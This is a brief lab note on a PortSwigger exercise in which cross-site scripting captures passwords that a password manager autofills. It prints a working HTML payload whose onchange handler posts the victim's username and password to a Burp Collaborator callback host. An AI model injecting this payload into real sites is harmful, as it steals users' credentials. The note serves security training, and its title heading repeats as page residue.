PortSwigger: Exploiting XSS+CSRF to Capture Passwords ¶

Password managers that automatically submit a username and password using forms allow bypassing common XSS data-exfiltration protections.

Example payload:

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://COLLAB_SUB.oastify.com',{
    method:'POST',
    mode: 'no-cors',
    body:username.value+':'+this.value
});">

Callback:

PortSwigger: Exploiting XSS+CSRF to Capture Passwords¶

PortSwigger: Exploiting XSS+CSRF to Capture Passwords ¶